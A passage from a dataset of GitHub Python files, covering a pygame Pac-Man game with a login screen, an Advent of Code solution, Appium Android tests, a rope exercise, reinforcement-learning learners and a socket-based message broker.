[2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 0, 0, 0, 0, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 0, 0, 0, 0, 0, 0, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 2, 2, 1, 2, 0, 0, 0, 0, 0, 0, 2, 1, 2, 2, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 0, 0, 0, 0, 0, 0, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 2],\r\n [2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2],\r\n [2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 1, 1, 1, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2]\r\n ]\r\n \r\n \r\n self.moviveis.pop(4)\r\n self.moviveis.pop(3)\r\n self.moviveis.pop(2)\r\n self.moviveis.pop(1)\r\n gameLoop()\r\n\r\n \r\n \r\n\r\n\r\n\r\nclass Pacman(ElementoJogo, Movivel):\r\n def __init__(self, tamanho):\r\n self.coluna = 1\r\n self.linha = 1\r\n self.centro_x = 400\r\n self.centro_y = 300\r\n self.tamanho = tamanho\r\n self.vel_x = 0\r\n self.vel_y = 0\r\n self.raio = self.tamanho // 2\r\n self.coluna_intencao = self.coluna\r\n self.linha_intencao = self.linha\r\n self.abertura = 0\r\n self.velocidade_abertura = 1\r\n\r\n def calcular_regras(self):\r\n self.coluna_intencao = self.coluna + self.vel_x\r\n self.linha_intencao = self.linha + self.vel_y\r\n self.centro_x = int(self.coluna * self.tamanho + self.raio)\r\n self.centro_y = 
int(self.linha * self.tamanho + self.raio)\r\n\r\n def pintar(self, tela):\r\n # Desenhar o corpo do Pacman\r\n pygame.draw.circle(tela, AMARELO, (self.centro_x, self.centro_y), self.raio, 0)\r\n\r\n self.abertura += self.velocidade_abertura\r\n if self.abertura > self.raio:\r\n self.velocidade_abertura = -1\r\n if self.abertura <= 0:\r\n self.velocidade_abertura = 1\r\n\r\n # Desenho da boca do Pacman\r\n canto_boca = (self.centro_x, self.centro_y)\r\n labio_superior = (self.centro_x + self.raio, self.centro_y - self.abertura)\r\n labio_inferior = (self.centro_x + self.raio, self.centro_y + self.abertura)\r\n pontos = [canto_boca, labio_superior, labio_inferior]\r\n pygame.draw.polygon(tela, PRETO, pontos, 0)\r\n\r\n # Olho do Pacman\r\n olho_x = int(self.centro_x + self.raio / 3)\r\n olho_y = int(self.centro_y - self.raio * 0.70)\r\n olho_raio = int(self.raio / 10)\r\n pygame.draw.circle(tela, PRETO, (olho_x, olho_y), olho_raio, 0)\r\n\r\n def processar_eventos(self, eventos):\r\n for e in eventos:\r\n if e.type == pygame.KEYDOWN:\r\n if e.key == pygame.K_RIGHT:\r\n self.vel_x = VELOCIDADE\r\n elif e.key == pygame.K_LEFT:\r\n self.vel_x = -VELOCIDADE\r\n elif e.key == pygame.K_UP:\r\n self.vel_y = -VELOCIDADE\r\n elif e.key == pygame.K_DOWN:\r\n self.vel_y = VELOCIDADE\r\n elif e.type == pygame.KEYUP:\r\n if e.key == pygame.K_RIGHT:\r\n self.vel_x = 0\r\n elif e.key == pygame.K_LEFT:\r\n self.vel_x = 0\r\n elif e.key == pygame.K_UP:\r\n self.vel_y = 0\r\n elif e.key == pygame.K_DOWN:\r\n self.vel_y = 0\r\n\r\n def aceitar_movimento(self):\r\n self.linha = self.linha_intencao\r\n self.coluna = self.coluna_intencao\r\n\r\n def recusar_movimento(self, direcoes):\r\n self.linha_intencao = self.linha\r\n self.coluna_intencao = self.coluna\r\n\r\n def esquina(self, direcoes):\r\n pass\r\n\r\n\r\nclass Fantasma(ElementoJogo):\r\n def __init__(self, cor, tamanho):\r\n self.coluna = 13.0\r\n self.linha = 15.0\r\n self.linha_intencao = self.linha\r\n self.coluna_intencao = self.coluna\r\n self.velocidade = 1\r\n self.direcao = ABAIXO\r\n self.tamanho = tamanho\r\n self.cor = cor\r\n\r\n def pintar(self, tela):\r\n fatia = self.tamanho // 8\r\n px = int(self.coluna * self.tamanho)\r\n py = int(self.linha * self.tamanho)\r\n contorno = [(px, py + self.tamanho),\r\n (px + fatia, py + fatia * 2),\r\n (px + fatia * 2, py + fatia // 2),\r\n (px + fatia * 3, py),\r\n (px + fatia * 5, py),\r\n (px + fatia * 6, py + fatia // 2),\r\n (px + fatia * 7, py + fatia * 2),\r\n (px + self.tamanho, py + self.tamanho)]\r\n pygame.draw.polygon(tela, self.cor, contorno, 0)\r\n\r\n olho_raio_ext = fatia\r\n olho_raio_int = fatia // 2\r\n\r\n olho_e_x = int(px + fatia * 2.5)\r\n olho_e_y = int(py + fatia * 2.5)\r\n\r\n olho_d_x = int(px + fatia * 5.5)\r\n olho_d_y = int(py + fatia * 2.5)\r\n\r\n pygame.draw.circle(tela, BRANCO, (olho_e_x, olho_e_y), olho_raio_ext, 0)\r\n pygame.draw.circle(tela, PRETO, (olho_e_x, olho_e_y), olho_raio_int, 0)\r\n pygame.draw.circle(tela, BRANCO, (olho_d_x, olho_d_y), olho_raio_ext, 0)\r\n pygame.draw.circle(tela, PRETO, (olho_d_x, olho_d_y), olho_raio_int, 0)\r\n\r\n def calcular_regras(self):\r\n if self.direcao == ACIMA:\r\n self.linha_intencao -= self.velocidade\r\n elif self.direcao == ABAIXO:\r\n self.linha_intencao += self.velocidade\r\n elif self.direcao == ESQUERDA:\r\n self.coluna_intencao -= self.velocidade\r\n elif self.direcao == DIREITA:\r\n self.coluna_intencao += self.velocidade\r\n\r\n def mudar_direcao(self, direcoes):\r\n self.direcao = random.choice(direcoes)\r\n\r\n 
def esquina(self, direcoes):\r\n self.mudar_direcao(direcoes)\r\n\r\n def aceitar_movimento(self):\r\n self.linha = self.linha_intencao\r\n self.coluna = self.coluna_intencao\r\n\r\n def recusar_movimento(self, direcoes):\r\n self.linha_intencao = self.linha\r\n self.coluna_intencao = self.coluna\r\n self.mudar_direcao(direcoes)\r\n\r\n def processar_eventos(self, evts):\r\n pass\r\n\r\n\r\ndef digitandoLogin(coord_x, coord_y, listaRender, modo):\r\n stringDigitada = ''\r\n clock = pygame.time.Clock()\r\n listaRender.append([])\r\n if modo == \"senha\":\r\n modoAsterisco = True\r\n else:\r\n modoAsterisco = False\r\n while True:\r\n for evento in pygame.event.get():\r\n if evento.type == pygame.QUIT:\r\n pygame.quit()\r\n break\r\n elif evento.type == pygame.KEYDOWN:\r\n if evento.key == pygame.K_ESCAPE and modo == \"senha\":\r\n modoAsterisco = not modoAsterisco\r\n if evento.key == pygame.K_BACKSPACE:\r\n stringDigitada = stringDigitada[:-1]\r\n digUnicode = str(evento.unicode)\r\n if ' '<=digUnicode<='~' and digUnicode != \" \":\r\n stringDigitada += digUnicode\r\n\r\n if not modoAsterisco:\r\n Digitacao_img = font.render(stringDigitada, True, BRANCO)\r\n else:\r\n Digitacao_img = font.render(len(stringDigitada) * \"*\", True, BRANCO)\r\n listaRender[-1] = [Digitacao_img, (coord_x, coord_y)]\r\n if evento.key == pygame.K_RETURN:\r\n return stringDigitada\r\n\r\n screen.fill(PRETO)\r\n for elementoRender in listaRender:\r\n if elementoRender != []:\r\n screen.blit(elementoRender[0], elementoRender[1])\r\n \r\n pygame.display.flip()\r\n clock.tick(30)\r\n\r\ndef telaLogin():\r\n clock = pygame.time.Clock()\r\n coord_x = 20\r\n loginInicio_img = font.render(\"Voce ja possui login? Pressione Y/N\", True, BRANCO)\r\n listaRender = [[loginInicio_img, (coord_x, 20)]]\r\n done = False\r\n tipoLogin = 0\r\n digitandoCoords = -1\r\n loginEnter = 0\r\n flagLoginInicial = False\r\n listaLogin = []\r\n while not done:\r\n for evento in pygame.event.get():\r\n if evento.type == pygame.QUIT:\r\n done = True\r\n pygame.quit()\r\n break\r\n elif evento.type == pygame.KEYDOWN:\r\n if evento.key == pygame.K_y:\r\n flagLoginInicial = True\r\n tipoLogin = 1\r\n login_img = font.render(\"LOGIN:\", True, BRANCO)\r\n listaRender.append([login_img, (coord_x, 20)])\r\n digitandoCoords = [coord_x, 45, \"login\"]\r\n elif evento.key == pygame.K_n:\r\n flagLoginInicial = True\r\n tipoLogin = 2\r\n loginNovo_img = font.render(\"LOGIN NOVO:\", True, BRANCO)\r\n listaRender.append([loginNovo_img, (coord_x, 20)])\r\n digitandoCoords = [coord_x, 45, \"login\"]\r\n\r\n if loginEnter == 1:\r\n if tipoLogin == 1:\r\n login_img = font.render(\"SENHA: (ESC para exibir)\", True, BRANCO)\r\n listaRender.append([login_img, (coord_x, 90)])\r\n digitandoCoords = [coord_x, 115, \"senha\"]\r\n if tipoLogin == 2:\r\n login_img = font.render(\"SENHA NOVA: (ESC para exibir)\", True, BRANCO)\r\n listaRender.append([login_img, (coord_x, 90)])\r\n digitandoCoords = [coord_x, 115, \"senha\"]\r\n \r\n screen.fill(PRETO)\r\n if flagLoginInicial == True:\r\n listaRender.pop(0)\r\n flagLoginInicial = False\r\n\r\n for elementoRender in listaRender:\r\n screen.blit(elementoRender[0], elementoRender[1])\r\n\r\n if digitandoCoords != -1:\r\n listaLogin.append(digitandoLogin(digitandoCoords[0], digitandoCoords[1] ,listaRender, digitandoCoords[2]))\r\n if len(listaLogin) == 2:\r\n if tipoLogin == 1:\r\n ##VERIFICAR LOGIN E RETORNAR listaLogin[0]\r\n if login.check_user(listaLogin[0], listaLogin[1]):\r\n return listaLogin[0]\r\n else:\r\n return 
telaLogin()\r\n elif tipoLogin == 2:\r\n ##REGISTRAR LOGIN E RETORNAR listaLogin[0]\r\n if not login.check_username_duplicity(listaLogin[0]):\r\n login.save_user(listaLogin[0], listaLogin[1])\r\n return listaLogin[0]\r\n else:\r\n login_img = font.render(\"Nome de usuario ja em uso\", True, VERMELHO)\r\n screen.blit(login_img, (coord_x, 160))\r\n pygame.display.flip()\r\n time.sleep(3)\r\n return telaLogin()\r\n\r\n loginEnter = 1\r\n digitandoCoords = -1\r\n\r\n pygame.display.flip()\r\n clock.tick(30)\r\n \r\n\r\ndef gameLoop():\r\n blinky = Fantasma(VERMELHO, size)\r\n inky = Fantasma(CIANO, size)\r\n clyde = Fantasma(LARANJA, size)\r\n pinky = Fantasma(ROSA, size)\r\n \r\n cenario.moviveis.append(blinky)\r\n cenario.moviveis.append(inky)\r\n cenario.moviveis.append(clyde)\r\n cenario.moviveis.append(pinky)\r\n \r\n while True:\r\n\r\n pacman.calcular_regras()\r\n blinky.calcular_regras()\r\n inky.calcular_regras()\r\n clyde.calcular_regras()\r\n pinky.calcular_regras()\r\n cenario.calcular_regras()\r\n\r\n # Pintar a tela\r\n screen.fill(PRETO)\r\n cenario.pintar(screen)\r\n pacman.pintar(screen)\r\n blinky.pintar(screen)\r\n inky.pintar(screen)\r\n clyde.pintar(screen)\r\n pinky.pintar(screen)\r\n pygame.display.update()\r\n pygame.time.delay(100)\r\n\r\n # Captura os eventos\r\n eventos = pygame.event.get()\r\n pacman.processar_eventos(eventos)\r\n cenario.processar_eventos(eventos)\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n size = 600 // 30\r\n\r\n nomeUsuario = telaLogin()\r\n \r\n pacman = Pacman(size)\r\n cenario = Cenario(size, pacman)\r\n cenario.adicionar_movivel(pacman)\r\n\r\n gameLoop()\r\n","repo_name":"progmodular2022/Grupo2","sub_path":"src/pacman.pyw","file_name":"pacman.pyw","file_ext":"pyw","file_size_in_byte":25653,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20405630412","text":"def problem1():\r\n\twith open(\"Day10/input1.txt\") as f:\r\n\t lines = f.read().splitlines() \r\n\tlines = [x.strip(\"\") for x in lines]\r\n\r\n\tbrackets_dict = {\"(\": \")\", \")\": \"(\", \"{\": \"}\", \"}\": \"{\", \"[\": \"]\", \"]\": \"[\", \"<\": \">\", \">\": \"<\"}\r\n\tbrackets_score = {\")\": 3, \"]\": 57, \"}\": 1197, \">\": 25137}\r\n\topen_chars = \"({[<\"\r\n\tclose_chars = \")}]>\"\r\n\r\n\tscore = 0\r\n\r\n\tfor line in lines:\r\n\t\tstack = []\r\n\r\n\t\tfor char in line:\r\n\t\t\tif char in open_chars:\r\n\t\t\t\tstack.append(char)\r\n\t\t\telse:\r\n\t\t\t\tif stack.pop() != brackets_dict[char]:\r\n\t\t\t\t\tscore += brackets_score[char]\r\n\t\t\t\t\tbreak\r\n\r\n\treturn score\r\n\t\r\nprint(problem1())","repo_name":"antoine1242/AdventOfCode","sub_path":"2021/Day10/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16424516486","text":"# This sample code uses the Appium python client\r\n# pip install Appium-Python-Client\r\n# Then you can paste this into a file and simply run with Python\r\nimport time\r\n\r\nfrom appium import webdriver\r\nimport pytest\r\nfrom appium.webdriver.common.mobileby import MobileBy\r\nfrom appium.webdriver.common.touch_action import TouchAction\r\nfrom appium.webdriver.webdriver import WebDriver\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\n\r\n\r\nclass TestXueqiuAndroid(object):\r\n\r\n driver=WebDriver\r\n @classmethod\r\n def 
setup_class(cls):\r\n print(\"setup class\")\r\n #cls.driver=cls.init_appium()\r\n cls.driver=cls.restart_appium()\r\n cls.driver.find_element_by_xpath(\"//android.widget.RelativeLayout[3]/android.widget.ImageView\").click()\r\n\r\n def setup_method(self):\r\n print(\"setup method\")\r\n\r\n #TestXueqiuAndroid.driver=self.restart_appium()\r\n self.driver = TestXueqiuAndroid.driver\r\n self.driver.find_element_by_xpath(\"//android.widget.RelativeLayout[3]/android.widget.ImageView\").click()\r\n\r\n def test_login(self):\r\n\r\n el1 = TestXueqiuAndroid.driver.find_element_by_xpath(\"/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.view.ViewGroup/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.TabHost/android.widget.LinearLayout/android.widget.TabWidget/android.widget.RelativeLayout[4]/android.widget.ImageView\")\r\n el1.click()\r\n el2 = TestXueqiuAndroid.driver.find_element_by_id(\"com.xueqiu.android:id/tv_login_phone\")\r\n el2.click()\r\n\r\n def test_swipe(self):\r\n self.driver.find_element_by_id(\"com.xueqiu.android:id/action_message\")\r\n for i in range(5):\r\n self.driver.swipe(500,500,200,200)\r\n time.sleep(2)\r\n\r\n def test_action(self):\r\n self.driver.find_element_by_id(\"com.xueqiu.android:id/action_message\")\r\n action=TouchAction(self.driver)\r\n for i in range(5):\r\n action.press(x=500,y=500).move_to(x=200,y=200).release().perform()\r\n time.sleep(2)\r\n\r\n def test_action_p(self):\r\n rect=self.driver.get_window_rect()\r\n\r\n self.driver.find_element_by_id(\"com.xueqiu.android:id/action_message\")\r\n action=TouchAction(self.driver)\r\n for i in range(5):\r\n action.press(x=rect['width']*0.8,y=rect['height']*0.8).move_to(x=rect['width']*0.2,y=rect['height']*0.2).release().perform()\r\n time.sleep(2)\r\n\r\n def test_webview_simulator_native(self):\r\n self.driver.find_element_by_xpath(\"//*[@text='A股开户']\").click()\r\n self.driver.find_element_by_xpath(\"//*[@text='立即开户']\")\r\n WebDriverWait(self.driver,10).\\\r\n until(EC.presence_of_element_located((MobileBy.XPATH,\"//*[@text='立即开户']\")))\r\n\r\n def test_webview_simulator_css(self):\r\n print(self.driver.contexts)\r\n print(self.driver.current_context)\r\n self.driver.switch_to.context(self.driver.contexts[0])\r\n print(self.driver.current_context)\r\n\r\n def test_message(self):\r\n TestXueqiuAndroid.driver.find_element_by_id(\"com.xueqiu.android:id/action_message\").click()\r\n\r\n\r\n @classmethod\r\n def init_appium(cls) -> WebDriver:\r\n caps = {}\r\n caps[\"platformName\"] = \"android\"\r\n caps[\"deviceName\"] = \"test\"\r\n caps[\"appPackage\"] = \"com.xueqiu.android\"\r\n caps[\"appActivity\"] = \".view.WelcomeActivityAlias\"\r\n #caps[\"noReset\"] = True\r\n driver = webdriver.Remote(\"http://localhost:4723/wd/hub\", caps)\r\n driver.implicitly_wait(20)\r\n return driver\r\n\r\n\r\n\r\n\r\n def teardown_method(self):\r\n self.driver.back()\r\n\r\n @classmethod\r\n def restart_appium(cls)->WebDriver:\r\n caps = {}\r\n caps[\"platformName\"] = \"android\"\r\n caps[\"deviceName\"] = \"test\"\r\n caps[\"appPackage\"] = \"com.xueqiu.android\"\r\n caps[\"appActivity\"] = \".view.WelcomeActivityAlias\"\r\n caps[\"noReset\"]=True\r\n driver = webdriver.Remote(\"http://localhost:5723/wd/hub\", caps)\r\n driver.implicitly_wait(20)\r\n return 
driver","repo_name":"pandaman95/pythonProject","sub_path":"AppiumDemo/test_xueqiu_webview.py","file_name":"test_xueqiu_webview.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20302361474","text":"# python3\n\nimport sys\n\nclass Rope:\n\tdef __init__(self, s):\n\t\tself.s = s\n\tdef result(self):\n\t\treturn self.s\n\tdef process(self, i, j, k):\n\t\tcut_out = self.s[i:j+1]\n\t\tremain = self.s[0:i] + self.s[j+1:]\n\t\tself.s = remain[0:k] + cut_out + remain[k:]\n\nrope = Rope(sys.stdin.readline().strip())\nq = int(sys.stdin.readline())\nfor _ in range(q):\n\ti, j, k = map(int, sys.stdin.readline().strip().split())\n\trope.process(i, j, k)\nprint(rope.result())\n","repo_name":"zy15662UNUK/courseraUCSDDataStructure","sub_path":"week 5 & 6/Programming-Assignment-4/rope/rope.py","file_name":"rope.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43458295732","text":"from __future__ import division, generators, print_function\nimport numpy as np\nimport sys\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom macarico.annealing import EWMA, stochastic\nfrom macarico.util import Var, Varng\n\nimport macarico\nfrom macarico import StochasticPolicy\n\nclass Reinforce(macarico.Learner):\n \"REINFORCE with a scalar baseline function.\"\n\n def __init__(self, policy, baseline=EWMA(0.8)):\n macarico.Learner.__init__(self)\n assert isinstance(policy, StochasticPolicy)\n self.policy = policy\n self.baseline = baseline\n self.trajectory = []\n\n def get_objective(self, loss):\n if len(self.trajectory) == 0: return 0.\n\n b = 0 if self.baseline is None else self.baseline()\n total_loss = sum((torch.log(p_a) for p_a in self.trajectory)) * (loss - b)\n\n if self.baseline is not None:\n self.baseline.update(loss)\n\n self.trajectory = []\n return total_loss\n\n def forward(self, state):\n action, p_action = self.policy.stochastic(state)\n self.trajectory.append(p_action)\n return action\n\nclass LinearValueFn(nn.Module):\n def __init__(self, features, disconnect_values=True):\n nn.Module.__init__(self)\n self.features = features\n self.dim = features.dim\n self.disconnect_values = disconnect_values\n self.value_fn = nn.Linear(self.dim, 1)\n\n def forward(self, state):\n x = self.features(state)\n if self.disconnect_values:\n x = Varng(x.data)\n #x *= 0\n #x[0,0] = 1\n return self.value_fn(x)\n\n\nclass A2C(macarico.Learner):\n def __init__(self, policy, state_value_fn, value_multiplier=1.0):\n macarico.Learner.__init__(self)\n self.policy = policy\n self.state_value_fn = state_value_fn\n self.trajectory = []\n self.value_multiplier = value_multiplier\n self.loss_fn = nn.SmoothL1Loss()\n self.loss_var = torch.zeros(1)\n\n def get_objective(self, loss):\n if len(self.trajectory) == 0: return\n loss = float(loss)\n loss_var = Varng(self.loss_var + loss)\n \n total_loss = 0.0\n for p_a, value in self.trajectory:\n v = value.data[0,0]\n\n # reinforcement loss\n total_loss += (loss - v) * p_a.log()\n\n # value fn approximator loss\n total_loss += self.value_multiplier * self.loss_fn(value, loss_var)\n\n self.trajectory = []\n return total_loss\n\n def forward(self, state):\n action, p_action = self.policy.stochastic(state)\n value = self.state_value_fn(state)\n # log action probabilities and values taken along current trajectory\n self.trajectory.append((p_action, 
value))\n return action\n","repo_name":"hal3/macarico","sub_path":"macarico/lts/reinforce.py","file_name":"reinforce.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"3"}
+{"seq_id":"41802638227","text":"#!/usr/bin/python\nimport wikipedia\nfrom gtts import gTTS\n\nsearchItem = raw_input('Enter query = ')\ninfo = wikipedia.summary(searchItem, sentences=2)\n\ntext_file = open(searchItem+'.txt', \"w\")\ntext_file.write(searchItem+\"\\n\")\ntext_file.write(info+\"\\n\")\ntext_file.close()\n","repo_name":"mentix02/Athena","sub_path":"temp/write.py","file_name":"write.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"5879240521","text":"# import socket programming library\nfrom socket import *\nimport os\nimport json\nimport datetime\nimport sys\nfrom time import time, ctime, sleep\n\n# from queue import Queue\n# import thread module\nfrom _thread import *\nimport threading\nimport logging\n\nprint_lock = threading.Lock()\nnum = 1\n#log={}\n\n\n\n# diction={}\ndef doesFileExists(filePathAndName):\n return os.path.exists(filePathAndName)\n\n\n# thread function\ndef threaded(c,addr):\n while True:\n\n # data received from client\n data = c.recv(1024)\n if not data:\n print('Bye')\n\n # lock released on exit\n # print_lock.release()\n break\n\n # global diction\n message = []\n\n # Decoding the message\n msg = str(data.decode('ascii'))\n\n # Splitting into a list\n L = msg.split()\n\n # producer side\n if (L[0] == 'p'):\n\n #logging.warning(\"A WARNING\")\n #logging.basicConfig(filename='msg.log', filemode='w', format='%(asctime)s - %(message)s')\n #logging.info(\"role :producer\")\n #log={'role':'producer','topic':L[1]}\n curr_dir = os.getcwd()\n topic = os.path.join(curr_dir, 'topic.json')\n print(topic)\n\n if doesFileExists(topic):\n with open(topic) as json_file:\n files = json.load(json_file)\n json_file.close()\n if L[1] not in files:\n files[L[1]] = 0\n else:\n files[L[1]] = files[L[1]] + 1\n\n with open(topic, 'w') as json_file:\n json.dump(files, json_file)\n json_file.close()\n else:\n jfile = open(topic, \"w\")\n jfile.close()\n\n files = {}\n files[L[1]] = 0\n\n with open(topic, 'w') as json_file:\n json.dump(files, json_file)\n json_file.close()\n\n # current time\n ct = datetime.datetime.now()\n\n # timestamp\n ts = ct.timestamp()\n\n # creating directory\n curr_dir = os.getcwd()\n final_dir = os.path.join(curr_dir, L[1])\n if not os.path.exists(final_dir):\n os.makedirs(final_dir)\n print(final_dir)\n\n # if L[1] not in diction:\n # diction[L[1]]=0\n\n message = ' '.join(map(str, L[2:]))\n #log.update({'message':message})\n # obj[str(ts)]=message\n\n filename = str(files[L[1]] // 5 + 1) + '.json'\n\n print(filename)\n final_dir = os.path.join(curr_dir, L[1] + '/' + filename)\n json_decoded = {}\n if doesFileExists(final_dir):\n with open(final_dir) as json_file:\n json_decoded = json.load(json_file)\n json_file.close()\n\n json_decoded[str(ts)] = message\n\n with open(final_dir, 'w') as json_file:\n json.dump(json_decoded, json_file)\n json_file.close()\n else:\n jfile = open(final_dir, \"w\")\n jfile.close()\n\n json_decoded = {}\n json_decoded[str(ts)] = message\n\n with open(final_dir, 'w') as json_file:\n json.dump(json_decoded, json_file)\n json_file.close()\n logging.basicConfig(level=logging.INFO, filename=\"py_log.log\", filemode=\"a\",\n format=\"%(asctime)s %(levelname)s 
%(message)s\")\n #logging.debug(\"A DEBUG Message\")\n logging.info(f\"\\nRole: Producer\\nTopic:{L[1]}\\nMessage:{message}\\nAddress:{addr}\\n\\n\")\n c.send(data)\n\n\n\n if (L[0] == 'c'):\n logging.basicConfig(level=logging.INFO, filename=\"py_log.log\", filemode=\"a\",\n format=\"%(asctime)s %(levelname)s %(message)s\")\n #logging.debug(\"A DEBUG Message\")\n logging.info(f\"\\nRole: Consumer\\nTopic:{L[1]}\\nAddress:{addr}\\n\\n\")\n if (L[-1] == \"e\"):\n try:\n\n out = \"\"\n j = 1\n filename = \"1.json\"\n curr_dir = os.getcwd()\n final_dir = os.path.join(curr_dir, L[1] + '/' + filename)\n json_decoded = {}\n message = []\n\n while doesFileExists(final_dir):\n with open(final_dir) as json_file:\n json_decoded = json.load(json_file)\n json_file.close()\n for i in json_decoded:\n message.append(json_decoded[i]+'\\n')\n j = j + 1\n filename = str(j) + '.json'\n final_dir = os.path.join(curr_dir, L[1] + '/' + filename)\n\n print(json_decoded)\n\n message = ' '.join(map(str, message))\n\n c.send(message.encode('ascii'))\n\n # f=open(L[1],\"r\")\n # print(L[1],f)\n # lines = f.readlines()\n # print(lines)\n # out=out+lines\n # print(out)\n # out= ' '.join(map(str, lines))\n # print(out)\n # f.close()\n\n except:\n out = \"No Topic\"\n c.send(out.encode('ascii'))\n\n try:\n filename = \"1.json\"\n curr_dir = os.getcwd()\n final_dir = os.path.join(curr_dir, L[1] + '/' + filename)\n j = 1\n message = []\n # print(L)\n json_decoded = {}\n while doesFileExists(final_dir):\n with open(final_dir) as json_file:\n json_decoded = json.load(json_file)\n json_file.close()\n for i in json_decoded:\n if (i > L[-1]):\n message.append(json_decoded[i]+'\\n')\n j = j + 1\n filename = str(j) + '.json'\n final_dir = os.path.join(curr_dir, L[1] + '/' + filename)\n\n if (len(message) == 0):\n message.append(\"No updates in the subscribed topic\")\n message = ' '.join(map(str, message))\n c.send(message.encode('ascii'))\n except:\n out = \"No Topic\"\n c.send(out.encode('ascii'))\n\n # c.send(data.encode('ascii'))\n\n # connection closed\n c.close()\n\n\ndef heartbeat():\n serverName = '127.0.0.1'\n serverPort = 12345\n clientSocket = socket(AF_INET, SOCK_STREAM)\n clientSocket.connect((serverName, serverPort))\n message = 'first'\n modi = 'first'\n while (1):\n # clientSocket.sendto(message.encode(), (serverName, serverPort))\n # print(\"Modified\", modi)\n if (modi == 'Leader'):\n start_new_thread(server, ())\n message = \"Leader1\"\n clientSocket.send(message.encode('ascii'))\n modifiedMessage = clientSocket.recv(1024)\n # print(modifiedMessage.decode('ascii'))\n modi = str(modifiedMessage.decode('ascii'))\n sleep(10)\n clientSocket.close()\n\n\ndef server():\n host = \"\"\n\n # reserve a port on your computer\n # in our case it is 12345 but it\n # can be anything\n # print_lock.acquire()\n\n port = 12341\n s = socket(AF_INET, SOCK_STREAM)\n s.bind((host, port))\n print(\"socket bound to port\", port)\n\n # put the socket into listening mode\n s.listen(5)\n print(\"socket is listening\")\n\n # a forever loop until client wants to exit\n while True:\n # establish connection with client\n c, addr = s.accept()\n\n # lock acquired by client\n # print_lock.acquire()\n print('Connected to :', addr[0], ':', addr[1])\n\n # Start a new thread and return its identifier\n start_new_thread(threaded, (c,addr,))\n\n # start_new_thread(broker,())\n s.close()\n\n\ndef Main():\n start_new_thread(heartbeat, ())\n while True:\n print(\"Alive\")\n sleep(10)\n\n\nif __name__ == 
'__main__':\n # print(\"1\")\n Main()\n","repo_name":"AtulKrishnan/Yet-Another-Kafka","sub_path":"broker.py","file_name":"broker.py","file_ext":"py","file_size_in_byte":8381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
